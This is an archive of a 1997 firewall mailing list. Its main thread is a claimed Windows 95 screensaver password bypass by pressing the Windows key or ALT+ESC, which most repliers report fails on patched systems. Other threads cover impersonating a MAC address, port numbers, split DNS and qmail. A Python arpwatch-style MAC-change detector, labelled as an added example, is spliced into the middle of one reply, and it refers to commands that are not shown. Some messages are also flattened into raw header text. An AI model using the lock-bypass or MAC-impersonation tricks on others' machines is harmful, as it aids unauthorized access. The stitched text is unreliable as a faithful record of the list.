Subject: RE: WIN'95 FLAW
Date: Tue, 14 Jan 1997 17:25:54 +0200

Palan,

I am running Windows '95 and have installed all patches as recommended
by microsoft. As of this time I have even put a microsoft keyboard onto
my system and am unable to get past the password on the screen saver.

There are about 5 patches you need to get. There is one patch that has
to do with the security of '95. If you do not know how to get them send
me mail and I will attach them to you.

Regards

Gavin Ferreiro
UNIX Consultant
gavin@tml.co.za
+27+11+280-5345 (Tel)
+27+11+280-5350 (Fax)
+27+83+265-2927 (Mobile)

----------
From: PaLaN[SMTP:palan@dataprep.com.my]
Sent: 15 January 1997 12:56
To: firewalls@GreatCircle.COM; sneakers@CS.YALE.EDU
Subject: WIN'95 FLAW

Howdy,

I juz encountered a security (i would call it) flaw in M$ Windows'95
screensaver !! I don't know anyone of you encountered this or not but here
it goes :

If the Windows'95 Screen saver is active, you can break into without any
password and all you have to do is : press the "windows" logo key (printed
on the M$ keyboard) and there you are.

If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
tried this with my own PC and my friends. It works.....try on your own PC.

Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here
ok..! Let me know if anyone of you encountered this.

I'm goin to send M$ a mail on this bug but before that, I need to know
whether any patch available for this...thx.
rgds,
PaLaN

From firewalls-owner Tue Jan 14 12:23:27 1997
From: "Starkweather, Mike"
To: "'firewalls@GreatCircle.COM'"
Subject: RE: Question
Date: Tue, 14 Jan 1997 09:18:26 -0600

I saw the following note in the newsgroup yesterday. It might help.

====================
According to Practical Unix & Internet Security (Garfinkel & Spafford,
Apr 1996, p.934) 5510 is used by a protocol called "securidprop"
described as "Security Dynamics ACE/Server slave."

Cheers!
Dave
...
Dave Neuman, SSgt, 100CS/SCBBN
Network Security Manager
RAF Mildenhall, UK
DSN Phone: 314-238-3860   CMCL Phone: +44-1638-543860
DSN Fax:   314-238-2504   CMCL Fax:   +44-1638-542504
mailto:dave.neuman@mildenhall.af.mil

>----------
>Hi
>
> does anyone know what tcp port 5510 is used for, or
>where I can find it out? - it is not listed in rfc 1700.
>
=====================

----------
From: blitton@directs.com[SMTP:blitton@directs.com]
Sent: Monday, January 13, 1997 5:42 PM
To: firewalls@GreatCircle.COM
Subject: Question

Can someone please tell me where I can find a list of port numbers and
process assigned to it. ie port 80 => http, port 443 => shttp.

I am especially interested in what port number is assigned to snmp.

Thanks in advanced and sorry if this is out of topic.

bruce

From firewalls-owner Tue Jan 14 12:36:00 1997
From: "Gary O. Abrams"
Message-Id: <199701141610.LAA16644@geek.advsys.com>
Subject: Re: WIN'95 FLAW
To: firewalls@greatcircle.com
Date: Tue, 14 Jan 1997 11:10:30 -0500 (EST)
In-Reply-To: from "Gary Hull" at Jan 14, 97 08:43:13 am

>
>On Tue, 14 Jan 1997, PaLaN wrote:
>
> If the Windows'95 Screen saver is active, you can break into without any
> password and all you have to do is : press the "windows" logo key (printed
> on the M$ keyboard) and there you are.
>

We have not seen this problem on any of our in-house systems.
I've also checked with a couple of our larger (Fortune 50) clients, and
they're not experiencing it either.

FYI, the systems referenced have SP1, and are clients of NT domains.

--
Gary

+-----------------------------------+
| Gary O. Abrams, President         |
| Advanced Systems Consulting, Inc. |
| Marlton, NJ 08053                 |
| Email: gabrams@advsys.com         |
+-----------------------------------+

From firewalls-owner Tue Jan 14 13:39:41 1997
Date: Tue, 14 Jan 1997 08:28:44 -0800 (PST)
From: Michael Baumann
To: sklee
cc: PaLaN , firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU
Subject: Re: WIN'95 FLAW
In-Reply-To: <32DC40B0.18FB@hitel.kol.net>

Ok people, what do you expect when you run 16 bit code on a 32 bit OS?
If you use one of the 32bit screensavers that ships with Win95, *NOT*
one of the ones that came with windoze 3.11, you cannot do this.
Yes, you can abort the system (reset) with the hardware or the power
switch, but CTL-ALT-DEL or CTL-ESC, or the `windows` key will get you
nothing.

[ Oh, and can we drop this out of firewalls now please? ]

On Tue, 14 Jan 1997, sklee wrote:

> PaLaN wrote:
> >
> > Howdy,
> >
> > I juz encountered a security (i would call it) flaw in M$ Windows'95
> > screensaver !! I don't know anyone of you encountered this or not but here
> > it goes :
> >
> > If the Windows'95 Screen saver is active, you can break into without any
> > password and all you have to do is : press the "windows" logo key (printed
> > on the M$ keyboard) and there you are.
> >
> > rgds,
> > PaLaN
>
> Good !!!!!
>
> M$ is crazy boy.....
>
> I will try that screen saver start and i put Ctrl+Alt+Delete and
> i kill screen saver ....that is killed...:-)
>
> This is great buggy!!
>
> sklee
>

--
Michael Baumann
Optivus Technology Inc.|Loma Linda University Medical Center
San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu

From firewalls-owner Tue Jan 14 13:48:01 1997
Date: Tue, 14 Jan 1997 09:56:45 -0700 (MST)
From: John Kozubik
To: PaLaN
cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU
Subject: Re: WIN'95 FLAW
In-Reply-To: <3.0.32.19970114145623.006882b0@202.190.59.4>

also, I am pretty sure you can just type ctrl-alt-del and just stop the
task itself in the task manager.
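The "Ethernet hardware addresses" thread earlier in this archive shows a MAC address being changed with three ifconfig commands, which is why a MAC proves nothing about who is on the wire. As an added example (not from any list post), here is an arpwatch-style monitor that keeps a baseline of IP-to-MAC bindings from successive `arp -a` snapshots and raises an event when a binding changes, flips back to an earlier value, or one MAC answers for several IPs; the host names, the 192.0.2.x addresses and the snapshots themselves are constructed sample data, with the two MACs taken from Todd's demonstration.

```python
"""arpwatch-style detection of changed Ethernet addresses (added example)."""
import re
from collections import defaultdict

# Matches `arp -a` lines such as:
#   reflections (192.0.2.10) at 00:a0:24:81:a7:44 [ether] on eth0
ARP_RE = re.compile(
    r"^\S+\s+\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)


def parse_arp(output):
    """Return {ip: mac} from `arp -a` style text, MACs lower-cased.
    Entries without a resolved MAC (e.g. '<incomplete>') are skipped."""
    table = {}
    for line in output.splitlines():
        m = ARP_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


class MacWatch:
    """Track IP->MAC bindings across snapshots and record anomalies."""

    def __init__(self):
        self.current = {}                 # ip -> mac in the latest snapshot
        self.history = defaultdict(set)   # ip -> every mac ever bound to it
        self.events = []                  # (kind, when, ip, new_mac, old_mac)

    def observe(self, snapshot, when):
        """Compare a {ip: mac} snapshot with the baseline; return new events."""
        new_events = []
        for ip, mac in sorted(snapshot.items()):
            old = self.current.get(ip)
            if old is None:
                new_events.append(("new station", when, ip, mac, None))
            elif old != mac:
                # A MAC this IP has used before and returns to is arpwatch's
                # "flip flop"; a never-seen MAC is a plain change.
                kind = ("flip flop" if mac in self.history[ip]
                        else "changed ethernet address")
                new_events.append((kind, when, ip, mac, old))
            self.current[ip] = mac
            self.history[ip].add(mac)

        # One MAC answering for several IPs within the same snapshot.
        ips_by_mac = defaultdict(list)
        for ip, mac in snapshot.items():
            ips_by_mac[mac].append(ip)
        for mac, ips in sorted(ips_by_mac.items()):
            if len(ips) > 1:
                new_events.append(("one MAC on several IPs", when,
                                   ",".join(sorted(ips)), mac, None))

        self.events.extend(new_events)
        return new_events


# Constructed sample snapshots; only the two reflections MACs come from the thread.
SNAPSHOTS = [
    ("09:00", "reflections (192.0.2.10) at 00:A0:24:81:A7:44 [ether] on eth0\n"
              "gw (192.0.2.1) at 00:00:0C:11:22:33 [ether] on eth0\n"),
    ("09:05", "reflections (192.0.2.10) at 00:A0:24:81:A7:45 [ether] on eth0\n"
              "gw (192.0.2.1) at 00:00:0C:11:22:33 [ether] on eth0\n"
              "lab1 (192.0.2.20) at <incomplete> on eth0\n"),
    ("09:10", "reflections (192.0.2.10) at 00:A0:24:81:A7:44 [ether] on eth0\n"
              "gw (192.0.2.1) at 00:00:0C:11:22:33 [ether] on eth0\n"
              "lab1 (192.0.2.20) at 00:00:0C:11:22:33 [ether] on eth0\n"),
]


def run(snapshots=SNAPSHOTS):
    """Feed the snapshots through a MacWatch and return every event raised."""
    watch = MacWatch()
    for when, text in snapshots:
        watch.observe(parse_arp(text), when)
    return watch.events


if __name__ == "__main__":
    for kind, when, ip, mac, old in run():
        tail = f" (was {old})" if old else ""
        print(f"{when} {kind:26s} {ip:<22s} {mac}{tail}")
```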
From firewalls-owner Tue Jan 14 13:50:40 1997
Message-ID: <32DBBCEF.6053@io.org>
Date: Tue, 14 Jan 1997 12:05:51 -0500
From: Peter Sigurdson
Reply-To: psigurd@io.org
To: Pilar Lavin Mera
CC: firewalls@GreatCircle.COM
Subject: Re: TIS FWtk + netscape
References: <199701141117.MAA08544@hydra.crisa.es>

In the security menu, you should configure the proxy box with the name
of your socks server.

From firewalls-owner Tue Jan 14 13:53:32 1997
From: nvs2@cornell.edu
Date: Tue, 14 Jan 1997 13:52:04 -0500 (EST)
To: firewalls@greatcircle.com
Subject: Unix or NT

Hi All,

I am a Master's student in Comp. Sc. and my master's project is the
design and implementation of a firewall. The basic question ahead of me
is whether to implement the firewall on NT or on Unix. Now, I don't know
the advantages / pitfalls of either approach and since this is just a
project my school doesn't care. But, all the discussions I hear on this
mailing list are mainly about Unix firewalls and all the books talk
about Unix only. Does that mean that it is tough to get any material to
build Unix software? Also is it easier to do it on Unix since everything
is so easily available.

I would greatly appreciate any advice that people would have.

Thanx

A very confused...
Nik.
------

From firewalls-owner Tue Jan 14 13:56:50 1997
Message-ID: <32DBCC97.3D60@io.org>
Date: Tue, 14 Jan 1997 13:12:39 -0500
From: Peter Sigurdson
Reply-To: psigurd@io.org
To: PaLaN
CC: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU
Subject: Re: WIN'95 FLAW
References: <3.0.32.19970114145623.006882b0@202.190.59.4>

I tried it - I can access the start menu, but not activate any of its
options - I have installed the service pack and all the fixpacks - maybe
one of them corrected this.???

From firewalls-owner Tue Jan 14 13:59:32 1997
Message-Id: <32DBBA69.70D4@90.deere.com>
Date: Tue, 14 Jan 1997 10:55:06 -0600
From: Bertrum Carroll
Organization: Deere & Company
To: Firewalls@GreatCircle.COM
Subject: wading in syslog files

Does anybody know of an app to review large syslog files for trouble
spots?

bc17684@90.deere.com
 Does anybody know of an app to review large syslog files for trouble spots?
 
bc17684@90.deere.com
------------137615D1535A1-- ------------428458D464AA0 Content-Transfer-Encoding: 7bit Content-Description: Address Book Card for Bertrum Carroll Content-Disposition: inline; filename="nsmail72.TMP" Content-Type: text/x-vCard; charset=us-ascii; name="nsmail72.TMP" BEGIN:VCARD FN:Bertrum Carroll N:Carroll;Bertrum EMAIL;INTERNET:bc17684@90.deere.com NOTE:Deere & Company Computer Security X-NAV-HTML:T END:VCARD ------------428458D464AA0-- From firewalls-owner Tue Jan 14 15:02:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA14542 for firewalls-outgoing; Tue, 14 Jan 1997 11:35:42 -0800 (PST) Received: from fti.framatech.com (fti.framatech.com [160.84.80.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA14505 for ; Tue, 14 Jan 1997 11:35:06 -0800 (PST) From: Thutchens@framatech.com Received: by fti.framatech.com; id OAA26168; Tue, 14 Jan 1997 14:56:24 -0500 Received: from ftimail.framatech.com(160.84.100.246) by fti.framatech.com via smap (3.2) id xma026144; Tue, 14 Jan 97 14:55:57 -0500 Received: from ccmail.framatech.com (ccmail.framatech.com [160.84.100.247]) by ftimail.framatech.com (8.6.11/8.6.9) with SMTP id OAA06535; Tue, 14 Jan 1997 14:38:00 -0500 Received: from ccMail by ccmail.framatech.com (SMTPLINK V2.11.01) id AA853281228; Tue, 14 Jan 97 13:34:16 EST Date: Tue, 14 Jan 97 13:34:16 EST Message-Id: <9700148532.AA853281228@ccmail.framatech.com> To: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU, PaLaN Subject: Re: WIN'95 FLAW Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Not a problem on mine...I can't ALT+ESC and bypass. Maybe it's your version of Win 95? ______________________________ Reply Separator _________________________________ Subject: WIN'95 FLAW Author: PaLaN at INTERNET Date: 1/14/97 3:57 AM Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! 
I don't know if any of you encountered this or not but here it goes:

If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is: press the "windows" logo key (printed on the M$ keyboard) and there you are.

If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends'. It works..... try on your own PC.

Hmmm.... M$ still the "King Of Buggy" err... i don't intend to flame M$ here ok..! Let me know if any of you encountered this.

I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch is available for this... thx.

rgds,
PaLaN

From firewalls-owner Tue Jan 14 15:08:13 1997
Date: Tue, 14 Jan 1997 10:25:08 -0800
From: "Boni D. Bruno"
Reply-To: bbruno@dsw.net
Organization: Data Systems West
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V6 #17 - FW-1 Hacking

Even if the FBI was using FW-1 and it was hacked, this does not prove FW-1 is a vulnerable firewall; it only shows that a misconfigured firewall can be penetrated. In most cases, it is these misconfigurations, design flaws or a poorly implemented security policy that are the real cause of such security breaches.

Boni D.
Bruno
Director of Internet Services & Security
Data Systems West

----------------------------------------------------
From: Timothy L Hermans

This is the most ridiculous proof I have ever heard. Have you corroborated his story? How? What if I told you that there was a host called "hoover-wears-a-dress.fbi.gov". Would that be proof that I had hacked the FBI? Of course not. You'd have to hack in yourself to see. Looks like you and this "guy" are caught up in hacker-itis (ie. the idea that hacking the FBI makes everyone think you have big cojones). Figure out how to USE FW-1 competently and I'd be much more impressed.

On Friday, Jan 10 "Gabriel Dura" wrote:
>
> There is a guy, working on his own, who claims he knows how to penetrate
> FBI's firewall.
> As a proof I was told that behind the firewall there is another
> computer 'phi.fbi.gov'.
>
> In the case of me being correctly informed and FBI is using FW-1 you have
> an answer.
>
> Hope it helps,
> Gabriel Dura
> dura@geocities.com
>
> P.S. I can not guarantee the accuracy of this information and I can not
> reveal the person who told me.
>
> > ----------
> > From: mike
> > To: firewalls@GreatCircle.COM
> > Subject: FW-1 hacked?
> > Date: Wednesday, January 08, 1997 16:27
> >
> > Hi all
> > Does anyone know if FW-1 was ever hacked?
> >

Tim Hermans
FannieMae/MornetPlus Unix Engineering Group
--

From firewalls-owner Tue Jan 14 17:17:40 1997
Date: Tue, 14 Jan 1997 15:38:51 -0500 (EST)
From: Todd Graham Lewis
To: Pilar Lavin Mera
Cc: firewalls@GreatCircle.COM
Subject: Re: TIS FWtk + netscape

On Tue, 14 Jan 1997, Pilar Lavin Mera wrote:

> My company has a network accessing the internet through a SUN Sparc
> Station + Solaris 2.3 and we have installed the TIS FWtoolkit. Our
> problem is that we cannot configure netscape to pass through the
> ftp-proxy. Can anyone help us?

I recommend using Squid for both anonymous ftp and web access. C.f.: http://www.nlanr.net/Squid

__
Todd Graham Lewis                                   Linux!
Core Engineering, Mindspring Enterprises            tlewis@mindspring.com
(800) 719 4664, x2804

From firewalls-owner Tue Jan 14 17:19:42 1997
Date: Tue, 14 Jan 1997 14:40:39 -0500 (EST)
From: Todd Graham Lewis
To: Ken Kempster
Cc: Firewalls Mailing List
Subject: Re: Ethernet hardware addresses

On Tue, 14 Jan 1997, Ken Kempster wrote:

> Is this a perm. change? I was under the impression that the MAC
> address was burned in at the factory. Will it revert back to its
> original address after a reboot?

It will revert to the original MAC upon reboot. However, if you are impersonating another ethernet card, then all you have to do is change the MAC address before bringing the interface up. There's no way, of which I can tell at least, to determine from outside whether or not the MAC is the factory-assigned one or a user-configured one.

__
Todd Graham Lewis                                   Linux!
Core Engineering, Mindspring Enterprises            tlewis@mindspring.com
(800) 719 4664, x2804

From firewalls-owner Tue Jan 14 18:12:30 1997
Date: Tue, 14 Jan 1997 15:27:05 -0500
From: mcruz@bracco.com (Michael Cruz)
To: palan@dataprep.com.my, gunni@if.is (Gunnar Ingvi Thorisson)
Cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU
Subject: Re[2]: WIN'95 FLAW

I thought this was the FIREWALL mailing list.

mike

______________________________ Reply Separator _________________________________
Subject: Re: WIN'95 FLAW
Author: gunni@if.is (Gunnar Ingvi Thorisson) at *Internet*
Date: 1/14/97 8:14 AM

> I juz encountered a security (i would call it) flaw in M$ Windows'95
> screensaver !! I don't know if any of you encountered this or not but here
> it goes:
>
> If the Windows'95 Screen saver is active, you can break into without any
> password and all you have to do is: press the "windows" logo key (printed
> on the M$ keyboard) and there you are.
>
> If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> tried this with my own PC and my friends'. It works..... try on your own PC.
This does not work for me, I've not tried to switch over to the English keyboard yet (I'm using Icelandic).

Gunni
gunni@if.is
gunni@coda.is

From firewalls-owner Tue Jan 14 19:10:51 1997
Date: Tue, 14 Jan 1997 15:03:01 +0000
From: elosiris@concentric.net
To: palan@dataprep.com.my (PaLaN), gunni@if.is (Gunnar Ingvi Thorisson)
Cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU
Subject: Re: WIN'95 FLAW

this also does not work for me and i have the win95 enhanced keyboard

From firewalls-owner Tue Jan 14 19:13:08 1997
Date: Wed, 15 Jan 1997 07:26:26 +1000 (EST)
From: Colin Campbell
To: lists@reflections.mindspring.com (Todd Graham Lewis)
Cc: firewalls@GreatCircle.COM
Subject: Re: Ethernet hardware addresses

Hi,

I'd just like to add another bit of information on this topic: the Quad Ethernet card from Sun, as used in Solaris boxes, does not have a MAC address! It just uses the Lance (le0) address. Hence all interfaces le0, qe0..qe3 have the same MAC address.

Colin

My mailer thinks Todd Graham Lewis said:
[lots of stuff about MAC addresses]

From firewalls-owner Tue Jan 14 20:03:41 1997
Date: Tue, 14 Jan 1997 20:36:17 -0500 (EST)
From: Elliot Lee
To: Michael Cruz
Cc: firewalls@greatcircle.com
Subject: Re: Re[2]: WIN'95 FLAW

On Tue, 14 Jan 1997, Michael Cruz wrote:

> I thought this was the FIREWALL mailing list.
The point is not to run Windows on your firewall (couldn't resist :D)

-- Elliot                       http://www.redhat.com/
"Huked on Fonix reely wurx fur me!"

From firewalls-owner Tue Jan 14 20:05:55 1997
Date: Wed, 15 Jan 97 09:05:19 +0700
From: ANDY_HIMAWAN@Non-HP-Indonesia-om1.om.hp.com
To: Firewalls@GreatCircle.COM
Subject: HTTP Authentication

Hello everybody,

I just want to get information: do any of you have experience using a Firewall (checkpoint, raptor, etc) with HPUX? Can the firewall run well with HPUX?

I have tried using FW-1 Ver. 2.1a from Checkpoint, running on HPUX series 700, Rel. 10.01. I have tried using the HTTP service with the action ACCEPT, and it works fine. But I always get trouble when I change the HTTP service to use User Authentication. The Firewall machine always hangs, and I can not install the policy to the firewall again. Is it because I have to install the patch for the HPUX?

Any solution will be appreciated. Thank you very much.
best regards,
Andy

From firewalls-owner Tue Jan 14 20:11:28 1997
Date: Tue, 14 Jan 97 21:36:27 EST
From: bve@omsk.quadrix.com (BVE)
To: firewalls@greatcircle.com
Subject: Re: Qmail

From: Darren Reed
> I don't want to throw cold water on the qmail authors' enthusiasm, but a
> reality check on this comparison seems needed. It is excellent to see
> someone is doing this but I can't see sendmail fading out of the picture
> any time soon.

I would second the reply already made to this message -- check out qmail. The design of several small programs, none of which run as root, is a very good one -- good enough that I don't feel I need smapd or smtpd in front of it. Why? Because the program that does the SMTP communication is as small as (or smaller than) smapd! More importantly, it does just one task -- receiving the mail. It does not even do the routing of mail to another machine. That task is left to another small program. The only place you're going to break into the process to get root is inetd -- qmail's SMTP program is run from there. (This isn't a performance problem, since the program is small. In fact, if the numbers quoted are to be believed, qmail's performance is rather good.)

Has anyone had a *bad* experience with qmail, yet? Anybody who's looked at the design have any potential downside in mind?? I'd love to hear about it!

--
Bill Van Emburg                 Phone: 908-235-2335
Quadrix Solutions, Inc.         Fax:   908-235-2336
(bve@quadrix.com)               Check out http://yourtown.com!
(http://quadrix.com)            "You do what you want, and if you didn't, you don't"

From firewalls-owner Tue Jan 14 20:13:16 1997
Date: Tue, 14 Jan 1997 22:02:35 -0500
From: Joseph Judge
To: Jung Jun Lee, 'char'
Cc: GreatCircle
Subject: RE: How can I configure hidden DNS on TIS?

I have to answer this ... I see that Char has (Hi Char!) answered.

Jung - Char seems to be pointing out a "split brain" DNS setup. This is where your internal users resolve their DNS against the company's internal DNS server. That server will forward requests to the firewall DNS server as needed to resolve external names. The firewall DNS machines resolve against the internal DNS server.

Internal names resolve against the internal DNS server ... Internet names get resolved by the internal server asking the firewall DNS server for answers.

So, you have the firewall DNS server - who thinks it is authoritative for XXX.com .... *AND* the internal DNS servers think they are authoritative for XXX.com, also. This is not a problem since they are serving "different faces" to the folks. The firewall DNS has the few names that the Internet needs ... the internal a fuller, richer set of records for internal folks. This just means that the internal DNS should not ask the firewall DNS server about XXX.com records ... but take the info from its own files.

Problems might be ...

Since the firewall resolves against internal servers, then through the firewall DNS server (to get non-XXX.com names) ... then you could get a tad bit of slowness. Also, internal DNS problems cause firewall hosts to have resolution problems.

Also, *IF* ... just if ... somehow ... some DNS server inside your company ever "sees" an external record for your XXX.com DNS --- it can "poison" your internal DNS servers.

For example, if your firewall application relay host is relay.XXX.com .... Your external DNS may have a * MX record for XXX.com via relay.XXX.com [ ip address 111.222.333.444 - the external interface ] ... if that record poisoned your internal DNS, it could cause internal email to stick --- trying to forward via the external interface of your firewall, which internal hosts cannot reach. This may also come with some glue records for the relay.XXX.com name so that email to the Internet is affected also (relay.XXX.com internally is thought to be at 111.222.333.444 - external interface).

Sorry to rant a bit on split brain DNS ... I don't see a need for it unless you have a transparent firewall and/or want internal hosts to do some firewall things transparently. I like the crossing from inside to outside to be noticeable to a user.

Cheers - * joe

----------
From: char[SMTP:csample@v-one.com]
Sent: Monday, January 13, 1997 5:06 AM
To: Jung Jun Lee
Cc: GreatCircle
Subject: Re: How can I configure hidden DNS on TIS?

On Mon, 13 Jan 1997, Jung Jun Lee wrote:

> Hi..
> If I configure TIS to primary DNS, Can I use internal DNS for hidden?
>
> Thanks
>

Of course this is a TIS customer support question... but you will need to build an internal primary DNS on another machine... the internal primary NS will slave forward to the Gauntlet. The Gauntlet has minimal names on it; point Gauntlet's /etc/resolv.conf to the internal nameserver.

char

+---------------------------------------------------------------------------+
char sample /* that really is my name */          e-mail: char@v-one.com
+---------------------------------------------------------------------------+

From firewalls-owner Tue Jan 14 20:17:38 1997
Date: Wed, 15 Jan 1997 18:52:27 +0800
From: pclow
Reply-To: pclow@pc.jaring.my
To: elosiris@concentric.net
Cc: PaLaN, Gunnar Ingvi Thorisson, firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU
Subject: Re: WIN'95 FLAW

Alright, alright, what PaLaN (lamer name) spewed was an old, repeat OLD bug that was rectified some releases ago. The new releases will not work with the alt+esc/ms key. However you will find that it may work with AfterDark. The one I have is one version ago (forgot which version, though).

--
What is man that thou art mindful of him?
elosiris@concentric.net wrote:
>
> this also does not work for me and i have the win95 enhanced keyboard
From firewalls-owner Tue Jan 14 21:04:42 1997
Date: Tue, 14 Jan 1997 23:39:20 -0400
From: "Jamie Thain"
To: "John LaMoureux"
Subject: Re: WIN'95 FLAW -Reply

John,

Ah, I don't think so, at least not NT 4.0. There was a known flaw in NT 3.51 where if you had the screen saver and ran the shutdown from the resource kit it would display a message saying that your PC was going to shut down, and then if you stopped it, you could get to an unlocked PC. However, are you sure you have "Password protected" selected?

regards: jamie

----------
> From: John LaMoureux
> To: sneakers@CS.YALE.EDU; palan@dataprep.com.my; firewalls@GreatCircle.COM
> Subject: WIN'95 FLAW -Reply
> Date: Tuesday, January 14, 1997 9:41 AM
>
> Unfortunately, this flaw can be found in M$ Windows NT as well, both
> SERVER and WORKSTATION (it works with any screen saver, even
> those that do not ship with the product.) I would also be interested in
> any known patch or fix, as I just started deploying NT throughout my
> enterprise!
>
> >>> PaLaN 01/14/97 05:56pm >>>
> Howdy,
>
> I juz encountered a security (i would call it) flaw in M$ Windows'95
> screensaver !!
> I don't know if any of you encountered this or not but here
> it goes:
>
> If the Windows'95 Screen saver is active, you can break into without any
> password and all you have to do is: press the "windows" logo key
> (printed on the M$ keyboard) and there you are.
>
> If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> tried this with my own PC and my friends'. It works..... try on your own PC.
>
> Hmmm.... M$ still the "King Of Buggy" err... i don't intend to flame M$ here
> ok..! Let me know if any of you encountered this.
>
> I'm goin to send M$ a mail on this bug but before that, I need to know
> whether any patch is available for this... thx.
>
> rgds,
> PaLaN

From firewalls-owner Tue Jan 14 21:15:50 1997
Date: Tue, 14 Jan 1997 22:28:37 -0600
From: Seale
Reply-To: jseale@sprynet.com
To: firewalls@greatcircle.com
Subject: Re: WIN'95 FLAW

sklee wrote:
>
> PaLaN wrote:
> >
> > Howdy,
> >
> > I juz encountered a security (i would call it) flaw in M$ Windows'95
> > screensaver !!
> > I don't know if any of you encountered this or not but here
> > it goes:
> >
> > If the Windows'95 Screen saver is active, you can break into without any
> > password and all you have to do is: press the "windows" logo key (printed
> > on the M$ keyboard) and there you are.
> >
> > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> > tried this with my own PC and my friends'. It works..... try on your own PC.
> >
> > Hmmm.... M$ still the "King Of Buggy" err... i don't intend to flame M$ here
> > ok..! Let me know if any of you encountered this.
> >
> > I'm goin to send M$ a mail on this bug but before that, I need to know
> > whether any patch is available for this... thx.
> >
> > rgds,
> > PaLaN
>
> Good !!!!!
>
> M$ is crazy boy.....
>
> I will try that screen saver start and i put Ctrl+Alt+Delete and
> i kill screen saver .... that is killed... :-)

Killed? True Windows95 screen savers do not exit with Ctrl+Alt+Del. If this was just a joke at the end, sorry. But if not, then take the above line to knowledge.

Will Seale (new)
Jseale@sprynet.com

PS That Alt+Esc didn't work either.
From firewalls-owner Wed Jan 15 00:04:02 1997
Date: Wed, 15 Jan 1997 13:19:28 -0800 (GMT-0800)
From: Jarn Calubiran <920145@balut.admu.edu.ph>
To: firewalls@greatcircle.com
Subject: Firewalls for dial-up access

I apologize beforehand if I missed a discussion on this, but most of the things I've been hearing from this list concern protecting the network from the outside. How about protecting the network from the inside in the case where you have dial-up lines into your network? I am aware that some dial-up servers perform strong authentication, but what if you really want the dial-up access to be essentially "isolated" from the network? How is this implemented?

Thanks in advance...
From firewalls-owner Wed Jan 15 00:04:05 1997
Date: Wed, 15 Jan 1997 18:02:17 +1300
From: geofft@thor (Geoff Tribble)
To: palan@dataprep.com.my
Cc: firewalls@greatcircle.com
Subject: Re: WIN'95 FLAW

>>
> If the Windows'95 Screen saver is active, you can break into without any
> password and all you have to do is: press the "windows" logo key (printed
> on the M$ keyboard) and there you are.
>
> If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> tried this with my own PC and my friends'. It works..... try on your own PC.
>

Do you have Service Pack One loaded?? Seems that this may fix the problem.
Also, CTRL+ALT+DEL with 16 bit screen savers will kill the screen-saver. Use a 32 bit screen saver.

Geoff Tribble
CSC New Zealand

From firewalls-owner Wed Jan 15 00:04:36 1997
Date: Wed, 15 Jan 1997 00:18:05 -0600
From: "crunch"
To: "Michael Cruz", "Gunnar Ingvi Thorisson"
Subject: Re: Re[2]: WIN'95 FLAW

yeah, no doubt... "duh... let's break into a WIN95 WORKSTATION through the SCREENSAVER... woah... we are soooo cool... "

Can we get back to security?

crunch
crunch@eden.com
crunch@geocities.com
http://www.eden.com/~crunch
http://www.geocities.com/SiliconValley/1189/
http://www.angelfire.com/tx/crunchfactory/index.html

----------
> From: Michael Cruz
> To: palan@dataprep.com.my; Gunnar Ingvi Thorisson
> Cc: firewalls@greatcircle.com; sneakers@CS.YALE.EDU
> Subject: Re[2]: WIN'95 FLAW
> Date: Tuesday, January 14, 1997 2:27 PM
>
> I thought this was the FIREWALL mailing list.
>
> mike
>
> ______________________________ Reply Separator _________________________________
> Subject: Re: WIN'95 FLAW
> Author: gunni@if.is (Gunnar Ingvi Thorisson) at *Internet*
> Date: 1/14/97 8:14 AM
>
> > I juz encountered a security (i would call it) flaw in M$ Windows'95
> > screensaver !!
I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > This does not work for me, I've not tried to switch over to the English > keyboard yet (I'm using Icelandic). > > Gunni > gunni@if.is > gunni@coda.is From firewalls-owner Wed Jan 15 00:13:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA09660 for firewalls-outgoing; Tue, 14 Jan 1997 18:09:05 -0800 (PST) Received: from palrel3.hp.com (palrel3.hp.com [15.253.88.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA09642 for ; Tue, 14 Jan 1997 18:08:47 -0800 (PST) From: ANDY_HIMAWAN@Non-HP-Indonesia-om1.om.hp.com Received: from hpsx1.indo.hp.com (root@hpsx1.indo.hp.com [15.59.169.1]) by palrel3.hp.com with SMTP (8.7.5/8.7.3) id SAA28960 for ; Tue, 14 Jan 1997 18:07:43 -0800 (PST) Received: from by hpsx1.indo.hp.com with SMTP (1.38.193.5/15.5+ECS 3.4 Openmail) id AA11202; Wed, 15 Jan 1997 09:07:21 +0700 X-Openmail-Hops: 1 Date: Wed, 15 Jan 97 09:06:54 +0700 Message-Id: Subject: HTTP Authentication To: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Item Subject: Message text Hello everybody, I have few questions when installing FW-1 Ver 2.1a running on HPUX Rel. 